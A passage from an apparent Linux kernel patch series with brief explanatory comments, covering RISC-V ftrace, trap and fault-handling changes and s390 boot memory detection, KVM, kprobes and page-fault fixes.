++	REG_L	a1, ABI_T0(sp)
+ 	addi	a1, a1, -FENTRY_RA_OFFSET
+ #ifdef HAVE_FUNCTION_GRAPH_FP_TEST
+ 	mv	a2, s0
+@@ -166,17 +156,17 @@ ftrace_graph_call:
+ 	call	ftrace_stub
+ #endif
+ 	RESTORE_ABI
+-	ret
++	jr t0
+ ENDPROC(ftrace_caller)
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ ENTRY(ftrace_regs_caller)
+ 	SAVE_ALL
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, PT_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_regs_call:
+@@ -196,6 +186,6 @@ ftrace_graph_regs_call:
+ #endif
+ 
+ 	RESTORE_ALL
+-	ret
++	jr t0
+ ENDPROC(ftrace_regs_caller)
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
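
For the mcount-dyn.S rework above: under the new convention the patch site at a function's entry is, presumably, an auipc/jalr pair through t0, i.e. two 4-byte instructions, so the trampolines compute the traced function as the address left in t0 minus 8 (the new FENTRY_RA_OFFSET), while ra still holds the real caller and can be passed straight through as the a1 argument. A sketch of that address arithmetic, with illustrative names only:

#define PATCH_INSNS	2	/* assumed: auipc t0 ; jalr t0 pair */
#define INSN_BYTES	4	/* uncompressed RISC-V instruction size */

/* Recover the traced function's entry from the return address the
 * patched call left in t0 (mirrors "addi a0, t0, -FENTRY_RA_OFFSET"). */
static unsigned long traced_entry(unsigned long t0)
{
	return t0 - PATCH_INSNS * INSN_BYTES;	/* t0 - 8 */
}
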
+diff --git a/arch/riscv/kernel/time.c b/arch/riscv/kernel/time.c
+index 8217b0f67c6cb..1cf21db4fcc77 100644
+--- a/arch/riscv/kernel/time.c
++++ b/arch/riscv/kernel/time.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #include <linux/of_clk.h>
++#include <linux/clockchips.h>
+ #include <linux/clocksource.h>
+ #include <linux/delay.h>
+ #include <asm/sbi.h>
+@@ -29,6 +30,8 @@ void __init time_init(void)
+ 
+ 	of_clk_init(NULL);
+ 	timer_probe();
++
++	tick_setup_hrtimer_broadcast();
+ }
+ 
+ void clocksource_arch_init(struct clocksource *cs)
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index f77cb8e42bd2a..5d07f6b3ca327 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -34,10 +34,11 @@ void die(struct pt_regs *regs, const char *str)
+ 	static int die_counter;
+ 	int ret;
+ 	long cause;
++	unsigned long flags;
+ 
+ 	oops_enter();
+ 
+-	spin_lock_irq(&die_lock);
++	spin_lock_irqsave(&die_lock, flags);
+ 	console_verbose();
+ 	bust_spinlocks(1);
+ 
+@@ -54,7 +55,7 @@ void die(struct pt_regs *regs, const char *str)
+ 
+ 	bust_spinlocks(0);
+ 	add_taint(TAINT_DIE, LOCKDEP_NOW_UNRELIABLE);
+-	spin_unlock_irq(&die_lock);
++	spin_unlock_irqrestore(&die_lock, flags);
+ 	oops_exit();
+ 
+ 	if (in_interrupt())
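
The die() hunk above is the standard irqsave pattern: die() can be entered with interrupts already disabled (an oops taken inside an irq-off region), and spin_unlock_irq() would re-enable them unconditionally on the way out. A minimal sketch of the safe form, using a placeholder lock rather than the real die_lock:

#include <linux/spinlock.h>

static DEFINE_SPINLOCK(demo_lock);

/* Callable from any context: the caller's interrupt state is captured
 * in "flags" and restored on unlock instead of being forced back on. */
static void demo_critical_section(void)
{
	unsigned long flags;

	spin_lock_irqsave(&demo_lock, flags);
	/* ... serialized work ... */
	spin_unlock_irqrestore(&demo_lock, flags);
}
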
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index d86f7cebd4a7e..eb0774d9c03b1 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -267,10 +267,12 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (user_mode(regs))
+ 		flags |= FAULT_FLAG_USER;
+ 
+-	if (!user_mode(regs) && addr < TASK_SIZE &&
+-			unlikely(!(regs->status & SR_SUM)))
+-		die_kernel_fault("access to user memory without uaccess routines",
+-				addr, regs);
++	if (!user_mode(regs) && addr < TASK_SIZE && unlikely(!(regs->status & SR_SUM))) {
++		if (fixup_exception(regs))
++			return;
++
++		die_kernel_fault("access to user memory without uaccess routines", addr, regs);
++	}
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+diff --git a/arch/s390/boot/boot.h b/arch/s390/boot/boot.h
+index 70418389414d3..939a1b7806df2 100644
+--- a/arch/s390/boot/boot.h
++++ b/arch/s390/boot/boot.h
+@@ -8,10 +8,26 @@
+ 
+ #ifndef __ASSEMBLY__
+ 
++struct vmlinux_info {
++	unsigned long default_lma;
++	void (*entry)(void);
++	unsigned long image_size;	/* does not include .bss */
++	unsigned long bss_size;		/* uncompressed image .bss size */
++	unsigned long bootdata_off;
++	unsigned long bootdata_size;
++	unsigned long bootdata_preserved_off;
++	unsigned long bootdata_preserved_size;
++	unsigned long dynsym_start;
++	unsigned long rela_dyn_start;
++	unsigned long rela_dyn_end;
++	unsigned long amode31_size;
++};
++
+ void startup_kernel(void);
+-unsigned long detect_memory(void);
++unsigned long detect_memory(unsigned long *safe_addr);
+ bool is_ipl_block_dump(void);
+ void store_ipl_parmblock(void);
++unsigned long read_ipl_report(unsigned long safe_addr);
+ void setup_boot_command_line(void);
+ void parse_boot_command_line(void);
+ void verify_facilities(void);
+@@ -20,6 +36,7 @@ void sclp_early_setup_buffer(void);
+ void print_pgm_check_info(void);
+ unsigned long get_random_base(unsigned long safe_addr);
+ void __printf(1, 2) decompressor_printk(const char *fmt, ...);
++void error(char *m);
+ 
+ /* Symbols defined by linker scripts */
+ extern const char kernel_version[];
+@@ -31,8 +48,11 @@ extern char __boot_data_start[], __boot_data_end[];
+ extern char __boot_data_preserved_start[], __boot_data_preserved_end[];
+ extern char _decompressor_syms_start[], _decompressor_syms_end[];
+ extern char _stack_start[], _stack_end[];
+-
+-unsigned long read_ipl_report(unsigned long safe_offset);
++extern char _end[];
++extern unsigned char _compressed_start[];
++extern unsigned char _compressed_end[];
++extern struct vmlinux_info _vmlinux_info;
++#define vmlinux _vmlinux_info
+ 
+ #endif /* __ASSEMBLY__ */
+ #endif /* BOOT_BOOT_H */
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index 623f6775d01d7..aad6f31fbd3d9 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -11,6 +11,7 @@
+ #include <linux/string.h>
+ #include <asm/page.h>
+ #include "decompressor.h"
++#include "boot.h"
+ 
+ /*
+  * gzip declarations
+diff --git a/arch/s390/boot/decompressor.h b/arch/s390/boot/decompressor.h
+index f75cc31a77dd9..92b81d2ea35d6 100644
+--- a/arch/s390/boot/decompressor.h
++++ b/arch/s390/boot/decompressor.h
+@@ -2,37 +2,11 @@
+ #ifndef BOOT_COMPRESSED_DECOMPRESSOR_H
+ #define BOOT_COMPRESSED_DECOMPRESSOR_H
+ 
+-#include <linux/stddef.h>
+-
+ #ifdef CONFIG_KERNEL_UNCOMPRESSED
+ static inline void *decompress_kernel(void) { return NULL; }
+ #else
+ void *decompress_kernel(void);
+ #endif
+ unsigned long mem_safe_offset(void);
+-void error(char *m);
+-
+-struct vmlinux_info {
+-	unsigned long default_lma;
+-	void (*entry)(void);
+-	unsigned long image_size;	/* does not include .bss */
+-	unsigned long bss_size;		/* uncompressed image .bss size */
+-	unsigned long bootdata_off;
+-	unsigned long bootdata_size;
+-	unsigned long bootdata_preserved_off;
+-	unsigned long bootdata_preserved_size;
+-	unsigned long dynsym_start;
+-	unsigned long rela_dyn_start;
+-	unsigned long rela_dyn_end;
+-	unsigned long amode31_size;
+-};
+-
+-/* Symbols defined by linker scripts */
+-extern char _end[];
+-extern unsigned char _compressed_start[];
+-extern unsigned char _compressed_end[];
+-extern char _vmlinux_info[];
+-
+-#define vmlinux (*(struct vmlinux_info *)_vmlinux_info)
+ 
+ #endif /* BOOT_COMPRESSED_DECOMPRESSOR_H */
+diff --git a/arch/s390/boot/kaslr.c b/arch/s390/boot/kaslr.c
+index e8d74d4f62aa5..58a8d8c8a1007 100644
+--- a/arch/s390/boot/kaslr.c
++++ b/arch/s390/boot/kaslr.c
+@@ -174,7 +174,6 @@ unsigned long get_random_base(unsigned long safe_addr)
+ {
+ 	unsigned long memory_limit = get_mem_detect_end();
+ 	unsigned long base_pos, max_pos, kernel_size;
+-	unsigned long kasan_needs;
+ 	int i;
+ 
+ 	memory_limit = min(memory_limit, ident_map_size);
+@@ -186,12 +185,7 @@ unsigned long get_random_base(unsigned long safe_addr)
+ 	 */
+ 	memory_limit -= kasan_estimate_memory_needs(memory_limit);
+ 
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size) {
+-		if (safe_addr < initrd_data.start + initrd_data.size)
+-			safe_addr = initrd_data.start + initrd_data.size;
+-	}
+ 	safe_addr = ALIGN(safe_addr, THREAD_SIZE);
+-
+ 	kernel_size = vmlinux.image_size + vmlinux.bss_size;
+ 	if (safe_addr + kernel_size > memory_limit)
+ 		return 0;
+diff --git a/arch/s390/boot/mem_detect.c b/arch/s390/boot/mem_detect.c
+index 7fa1a32ea0f3f..daa1593171835 100644
+--- a/arch/s390/boot/mem_detect.c
++++ b/arch/s390/boot/mem_detect.c
+@@ -16,29 +16,10 @@ struct mem_detect_info __bootdata(mem_detect);
+ #define ENTRIES_EXTENDED_MAX						       \
+ 	(256 * (1020 / 2) * sizeof(struct mem_detect_block))
+ 
+-/*
+- * To avoid corrupting old kernel memory during dump, find lowest memory
+- * chunk possible either right after the kernel end (decompressed kernel) or
+- * after initrd (if it is present and there is no hole between the kernel end
+- * and initrd)
+- */
+-static void *mem_detect_alloc_extended(void)
+-{
+-	unsigned long offset = ALIGN(mem_safe_offset(), sizeof(u64));
+-
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+-	    initrd_data.start < offset + ENTRIES_EXTENDED_MAX)
+-		offset = ALIGN(initrd_data.start + initrd_data.size, sizeof(u64));
+-
+-	return (void *)offset;
+-}
+-
+ static struct mem_detect_block *__get_mem_detect_block_ptr(u32 n)
+ {
+ 	if (n < MEM_INLINED_ENTRIES)
+ 		return &mem_detect.entries[n];
+-	if (unlikely(!mem_detect.entries_extended))
+-		mem_detect.entries_extended = mem_detect_alloc_extended();
+ 	return &mem_detect.entries_extended[n - MEM_INLINED_ENTRIES];
+ }
+ 
+@@ -147,7 +128,7 @@ static int tprot(unsigned long addr)
+ 	return rc;
+ }
+ 
+-static void search_mem_end(void)
++static unsigned long search_mem_end(void)
+ {
+ 	unsigned long range = 1 << (MAX_PHYSMEM_BITS - 20); /* in 1MB blocks */
+ 	unsigned long offset = 0;
+@@ -159,33 +140,34 @@ static void search_mem_end(void)
+ 		if (!tprot(pivot << 20))
+ 			offset = pivot;
+ 	}
+-
+-	add_mem_detect_block(0, (offset + 1) << 20);
++	return (offset + 1) << 20;
+ }
+ 
+-unsigned long detect_memory(void)
++unsigned long detect_memory(unsigned long *safe_addr)
+ {
+-	unsigned long max_physmem_end;
++	unsigned long max_physmem_end = 0;
+ 
+ 	sclp_early_get_memsize(&max_physmem_end);
++	mem_detect.entries_extended = (struct mem_detect_block *)ALIGN(*safe_addr, sizeof(u64));
+ 
+ 	if (!sclp_early_read_storage_info()) {
+ 		mem_detect.info_source = MEM_DETECT_SCLP_STOR_INFO;
+-		return max_physmem_end;
+-	}
+-
+-	if (!diag260()) {
++	} else if (!diag260()) {
+ 		mem_detect.info_source = MEM_DETECT_DIAG260;
+-		return max_physmem_end;
+-	}
+-
+-	if (max_physmem_end) {
++		max_physmem_end = max_physmem_end ?: get_mem_detect_end();
++	} else if (max_physmem_end) {
+ 		add_mem_detect_block(0, max_physmem_end);
+ 		mem_detect.info_source = MEM_DETECT_SCLP_READ_INFO;
+-		return max_physmem_end;
++	} else {
++		max_physmem_end = search_mem_end();
++		add_mem_detect_block(0, max_physmem_end);
++		mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
++	}
++
++	if (mem_detect.count > MEM_INLINED_ENTRIES) {
++		*safe_addr += (mem_detect.count - MEM_INLINED_ENTRIES) *
++			     sizeof(struct mem_detect_block);
+ 	}
+ 
+-	search_mem_end();
+-	mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
+-	return get_mem_detect_end();
++	return max_physmem_end;
+ }
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index 47ca3264c0230..e0863d28759a5 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -57,16 +57,17 @@ unsigned long mem_safe_offset(void)
+ }
+ #endif
+ 
+-static void rescue_initrd(unsigned long addr)
++static unsigned long rescue_initrd(unsigned long safe_addr)
+ {
+ 	if (!IS_ENABLED(CONFIG_BLK_DEV_INITRD))
+-		return;
++		return safe_addr;
+ 	if (!initrd_data.start || !initrd_data.size)
+-		return;
+-	if (addr <= initrd_data.start)
+-		return;
+-	memmove((void *)addr, (void *)initrd_data.start, initrd_data.size);
+-	initrd_data.start = addr;
++		return safe_addr;
++	if (initrd_data.start < safe_addr) {
++		memmove((void *)safe_addr, (void *)initrd_data.start, initrd_data.size);
++		initrd_data.start = safe_addr;
++	}
++	return initrd_data.start + initrd_data.size;
+ }
+ 
+ static void copy_bootdata(void)
+@@ -250,6 +251,7 @@ static unsigned long reserve_amode31(unsigned long safe_addr)
+ 
+ void startup_kernel(void)
+ {
++	unsigned long max_physmem_end;
+ 	unsigned long random_lma;
+ 	unsigned long safe_addr;
+ 	void *img;
+@@ -265,12 +267,13 @@ void startup_kernel(void)
+ 	safe_addr = reserve_amode31(safe_addr);
+ 	safe_addr = read_ipl_report(safe_addr);
+ 	uv_query_info();
+-	rescue_initrd(safe_addr);
++	safe_addr = rescue_initrd(safe_addr);
+ 	sclp_early_read_info();
+ 	setup_boot_command_line();
+ 	parse_boot_command_line();
+ 	sanitize_prot_virt_host();
+-	setup_ident_map_size(detect_memory());
++	max_physmem_end = detect_memory(&safe_addr);
++	setup_ident_map_size(max_physmem_end);
+ 	setup_vmalloc_size();
+ 	setup_kernel_memory_layout();
+ 
+diff --git a/arch/s390/include/asm/ap.h b/arch/s390/include/asm/ap.h
+index f508f5025e388..57a2d6518d272 100644
+--- a/arch/s390/include/asm/ap.h
++++ b/arch/s390/include/asm/ap.h
+@@ -239,7 +239,10 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 	union {
+ 		unsigned long value;
+ 		struct ap_qirq_ctrl qirqctrl;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2 = pa_ind;
+ 
+@@ -253,7 +256,7 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 		"	lgr	%[reg1],1\n"		/* gr1 (status) into reg1 */
+ 		: [reg1] "+&d" (reg1)
+ 		: [reg0] "d" (reg0), [reg2] "d" (reg2)
+-		: "cc", "0", "1", "2");
++		: "cc", "memory", "0", "1", "2");
+ 
+ 	return reg1.status;
+ }
+@@ -290,7 +293,10 @@ static inline struct ap_queue_status ap_qact(ap_qid_t qid, int ifbit,
+ 	unsigned long reg0 = qid | (5UL << 24) | ((ifbit & 0x01) << 22);
+ 	union {
+ 		unsigned long value;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2;
+ 
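
The _pad members added to ap_aqic() and ap_qact() account for s390 being big-endian: overlaying a 32-bit struct at offset 0 of a 64-bit register image puts it in the register's high half, while the status word comes back in the low half of GR1, so a leading 32-bit pad is needed to line the two up. The extra "memory" clobber, separately, tells the compiler the instruction may touch memory not named by the asm operands. A stand-alone illustration of the union layout, using plain C types rather than the kernel's:

#include <stdint.h>

/* On a big-endian 64-bit target the first member overlays the most
 * significant bytes, so viewing the LOW half of the register through
 * a 32-bit member requires a leading pad. */
union reg1_image {
	uint64_t value;
	struct {
		uint32_t pad;		/* high 32 bits of the register */
		uint32_t status;	/* low 32 bits, where the status lives */
	};
};
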
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 6030fdd6997bc..9693c8630e73f 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -288,7 +288,6 @@ static void __init sort_amode31_extable(void)
+ 
+ void __init startup_init(void)
+ {
+-	sclp_early_adjust_va();
+ 	reset_tod_clock();
+ 	check_image_bootable();
+ 	time_early_init();
+diff --git a/arch/s390/kernel/head64.S b/arch/s390/kernel/head64.S
+index d7b8b6ad574dc..3b3bf8329e6c1 100644
+--- a/arch/s390/kernel/head64.S
++++ b/arch/s390/kernel/head64.S
+@@ -25,6 +25,7 @@ ENTRY(startup_continue)
+ 	larl	%r14,init_task
+ 	stg	%r14,__LC_CURRENT
+ 	larl	%r15,init_thread_union+THREAD_SIZE-STACK_FRAME_OVERHEAD-__PT_SIZE
++	brasl	%r14,sclp_early_adjust_va	# allow sclp_early_printk
+ #ifdef CONFIG_KASAN
+ 	brasl	%r14,kasan_early_init
+ #endif
+diff --git a/arch/s390/kernel/idle.c b/arch/s390/kernel/idle.c
+index 4bf1ee293f2b3..a0da049e73609 100644
+--- a/arch/s390/kernel/idle.c
++++ b/arch/s390/kernel/idle.c
+@@ -44,7 +44,7 @@ void account_idle_time_irq(void)
+ 	S390_lowcore.last_update_timer = idle->timer_idle_exit;
+ }
+ 
+-void arch_cpu_idle(void)
++void noinstr arch_cpu_idle(void)
+ {
+ 	struct s390_idle_data *idle = this_cpu_ptr(&s390_idle);
+ 	unsigned long idle_time;
+diff --git a/arch/s390/kernel/kprobes.c b/arch/s390/kernel/kprobes.c
+index 0032bdbe8e3fa..6c8872f76fb39 100644
+--- a/arch/s390/kernel/kprobes.c
++++ b/arch/s390/kernel/kprobes.c
+@@ -279,6 +279,7 @@ static void pop_kprobe(struct kprobe_ctlblk *kcb)
+ {
+ 	__this_cpu_write(current_kprobe, kcb->prev_kprobe.kp);
+ 	kcb->kprobe_status = kcb->prev_kprobe.status;
++	kcb->prev_kprobe.kp = NULL;
+ }
+ NOKPROBE_SYMBOL(pop_kprobe);
+ 
+@@ -433,12 +434,11 @@ static int post_kprobe_handler(struct pt_regs *regs)
+ 	if (!p)
+ 		return 0;
+ 
++	resume_execution(p, regs);
+ 	if (kcb->kprobe_status != KPROBE_REENTER && p->post_handler) {
+ 		kcb->kprobe_status = KPROBE_HIT_SSDONE;
+ 		p->post_handler(p, regs, 0);
+ 	}
+-
+-	resume_execution(p, regs);
+ 	pop_kprobe(kcb);
+ 	preempt_enable_no_resched();
+ 
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 9e2b95a222a98..1605ba45ac4c0 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,7 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+ ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index cbf9c1b0beda4..729d4f949cfe8 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -228,5 +228,6 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(.eh_frame)
++		*(.interp)
+ 	}
+ }
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index bc491a73815c3..26f89ec3062ba 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -5579,23 +5579,40 @@ int kvm_arch_prepare_memory_region(struct kvm *kvm,
+ 	if (kvm_s390_pv_get_handle(kvm))
+ 		return -EINVAL;
+ 
+-	if (change == KVM_MR_DELETE || change == KVM_MR_FLAGS_ONLY)
+-		return 0;
++	if (change != KVM_MR_DELETE && change != KVM_MR_FLAGS_ONLY) {
++		/*
++		 * A few sanity checks. We can have memory slots which have to be
++		 * located/ended at a segment boundary (1MB). The memory in userland is
++		 * ok to be fragmented into various different vmas. It is okay to mmap()
++		 * and munmap() stuff in this slot after doing this call at any time
++		 */
+ 
+-	/* A few sanity checks. We can have memory slots which have to be
+-	   located/ended at a segment boundary (1MB). The memory in userland is
+-	   ok to be fragmented into various different vmas. It is okay to mmap()
+-	   and munmap() stuff in this slot after doing this call at any time */
++		if (new->userspace_addr & 0xffffful)
++			return -EINVAL;
+ 
+-	if (new->userspace_addr & 0xffffful)
+-		return -EINVAL;
++		size = new->npages * PAGE_SIZE;
++		if (size & 0xffffful)
++			return -EINVAL;
+ 
+-	size = new->npages * PAGE_SIZE;
+-	if (size & 0xffffful)
+-		return -EINVAL;
++		if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
++			return -EINVAL;
++	}
+ 
+-	if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
+-		return -EINVAL;
++	if (!kvm->arch.migration_mode)
++		return 0;
++
++	/*
++	 * Turn off migration mode when:
++	 * - userspace creates a new memslot with dirty logging off,
++	 * - userspace modifies an existing memslot (MOVE or FLAGS_ONLY) and
++	 *   dirty logging is turned off.
++	 * Migration mode expects dirty page logging being enabled to store
++	 * its dirty bitmap.
++	 */
++	if (change != KVM_MR_DELETE &&
++	    !(new->flags & KVM_MEM_LOG_DIRTY_PAGES))
++		WARN(kvm_s390_vm_stop_migration(kvm),
++		     "Failed to stop migration mode");
+ 
+ 	return 0;
+ }
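
The restructured kvm_arch_prepare_memory_region() keeps the invariant its comment states: slots must begin and end on a 1 MB segment boundary, which is exactly what masking with 0xffffful (the low 20 bits) tests. As a stand-alone sketch:

#include <stdbool.h>

#define SEG_SIZE	(1UL << 20)	/* 1 MB segment */

/* True when addr lies on a segment boundary (low 20 bits clear). */
static inline bool seg_aligned(unsigned long addr)
{
	return (addr & (SEG_SIZE - 1)) == 0;
}
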
+diff --git a/arch/s390/mm/dump_pagetables.c b/arch/s390/mm/dump_pagetables.c
+index 9953819d79596..ba5f802688781 100644
+--- a/arch/s390/mm/dump_pagetables.c
++++ b/arch/s390/mm/dump_pagetables.c
+@@ -33,10 +33,6 @@ enum address_markers_idx {
+ #endif
+ 	IDENTITY_AFTER_NR,
+ 	IDENTITY_AFTER_END_NR,
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	VMEMMAP_NR,
+ 	VMEMMAP_END_NR,
+ 	VMALLOC_NR,
+@@ -47,6 +43,10 @@ enum address_markers_idx {
+ 	ABS_LOWCORE_END_NR,
+ 	MEMCPY_REAL_NR,
+ 	MEMCPY_REAL_END_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ };
+ 
+ static struct addr_marker address_markers[] = {
+@@ -62,10 +62,6 @@ static struct addr_marker address_markers[] = {
+ #endif
+ 	[IDENTITY_AFTER_NR]	= {(unsigned long)_end, "Identity Mapping Start"},
+ 	[IDENTITY_AFTER_END_NR]	= {0, "Identity Mapping End"},
+-#ifdef CONFIG_KASAN
+-	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
+-	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
+-#endif
+ 	[VMEMMAP_NR]		= {0, "vmemmap Area Start"},
+ 	[VMEMMAP_END_NR]	= {0, "vmemmap Area End"},
+ 	[VMALLOC_NR]		= {0, "vmalloc Area Start"},
+@@ -76,6 +72,10 @@ static struct addr_marker address_markers[] = {
+ 	[ABS_LOWCORE_END_NR]	= {0, "Lowcore Area End"},
+ 	[MEMCPY_REAL_NR]	= {0, "Real Memory Copy Area Start"},
+ 	[MEMCPY_REAL_END_NR]	= {0, "Real Memory Copy Area End"},
++#ifdef CONFIG_KASAN
++	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
++	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
++#endif
+ 	{ -1, NULL }
+ };
+ 
+diff --git a/arch/s390/mm/extmem.c b/arch/s390/mm/extmem.c
+index 5060956b8e7d6..1bc42ce265990 100644
+--- a/arch/s390/mm/extmem.c
++++ b/arch/s390/mm/extmem.c
+@@ -289,15 +289,17 @@ segment_overlaps_others (struct dcss_segment *seg)
+ 
+ /*
+  * real segment loading function, called from segment_load
++ * Must return either an error code < 0, or the segment type code >= 0
+  */
+ static int
+ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long *end)
+ {
+ 	unsigned long start_addr, end_addr, dummy;
+ 	struct dcss_segment *seg;
+-	int rc, diag_cc;
++	int rc, diag_cc, segtype;
+ 
+ 	start_addr = end_addr = 0;
++	segtype = -1;
+ 	seg = kmalloc(sizeof(*seg), GFP_KERNEL | GFP_DMA);
+ 	if (seg == NULL) {
+ 		rc = -ENOMEM;
+@@ -326,9 +328,9 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+ 	seg->res_name[8] = '\0';
+ 	strlcat(seg->res_name, " (DCSS)", sizeof(seg->res_name));
+ 	seg->res->name = seg->res_name;
+-	rc = seg->vm_segtype;
+-	if (rc == SEG_TYPE_SC ||
+-	    ((rc == SEG_TYPE_SR || rc == SEG_TYPE_ER) && !do_nonshared))
++	segtype = seg->vm_segtype;
++	if (segtype == SEG_TYPE_SC ||
++	    ((segtype == SEG_TYPE_SR || segtype == SEG_TYPE_ER) && !do_nonshared))
+ 		seg->res->flags |= IORESOURCE_READONLY;
+ 
+ 	/* Check for overlapping resources before adding the mapping. */
+@@ -386,7 +388,7 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+  out_free:
+ 	kfree(seg);
+  out:
+-	return rc;
++	return rc < 0 ? rc : segtype;
+ }
+ 
+ /*
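
The __segment_load() hunks fix a classic status/payload mix-up: rc carried both the non-negative segment type the caller wants and the error codes from later steps, so a subsequent assignment could clobber the type, or a stale type could mask a failure. Keeping the two in separate variables and merging only at the end avoids that; a sketch with placeholder helpers (not kernel APIs):

static int compute_type(void);	/* placeholder: yields payload >= 0 */
static int later_step(void);	/* placeholder: 0 or negative errno */

static int do_load(void)
{
	int rc, type;

	type = compute_type();
	rc = later_step();
	return rc < 0 ? rc : type;	/* status never clobbers payload */
}
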
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 9649d9382e0ae..8e84ed2bb944e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -96,6 +96,20 @@ static enum fault_type get_fault_type(struct pt_regs *regs)
+ 	return KERNEL_FAULT;
+ }
+ 
++static unsigned long get_fault_address(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return trans_exc_code & __FAIL_ADDR_MASK;
++}
++
++static bool fault_is_write(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return (trans_exc_code & store_indication) == 0x400;
++}
++
+ static int bad_address(void *p)
+ {
+ 	unsigned long dummy;
+@@ -228,15 +242,26 @@ static noinline void do_sigsegv(struct pt_regs *regs, int si_code)
+ 			(void __user *)(regs->int_parm_long & __FAIL_ADDR_MASK));
+ }
+ 
+-static noinline void do_no_context(struct pt_regs *regs)
++static noinline void do_no_context(struct pt_regs *regs, vm_fault_t fault)
+ {
++	enum fault_type fault_type;
++	unsigned long address;
++	bool is_write;
++
+ 	if (fixup_exception(regs))
+ 		return;
++	fault_type = get_fault_type(regs);
++	if ((fault_type == KERNEL_FAULT) && (fault == VM_FAULT_BADCONTEXT)) {
++		address = get_fault_address(regs);
++		is_write = fault_is_write(regs);
++		if (kfence_handle_page_fault(address, is_write, regs))
++			return;
++	}
+ 	/*
+ 	 * Oops. The kernel tried to access some bad page. We'll have to
+ 	 * terminate things with extreme prejudice.
+ 	 */
+-	if (get_fault_type(regs) == KERNEL_FAULT)
++	if (fault_type == KERNEL_FAULT)
+ 		printk(KERN_ALERT "Unable to handle kernel pointer dereference"
+ 		       " in virtual kernel address space\n");
+ 	else
+@@ -255,7 +280,7 @@ static noinline void do_low_address(struct pt_regs *regs)
+ 		die (regs, "Low-address protection");
+ 	}
+ 
+-	do_no_context(regs);
++	do_no_context(regs, VM_FAULT_BADACCESS);
+ }
+ 
+ static noinline void do_sigbus(struct pt_regs *regs)
+@@ -286,28 +311,28 @@ static noinline void do_fault_error(struct pt_regs *regs, vm_fault_t fault)
+ 		fallthrough;
+ 	case VM_FAULT_BADCONTEXT:
+ 	case VM_FAULT_PFAULT:
+-		do_no_context(regs);
++		do_no_context(regs, fault);
+ 		break;
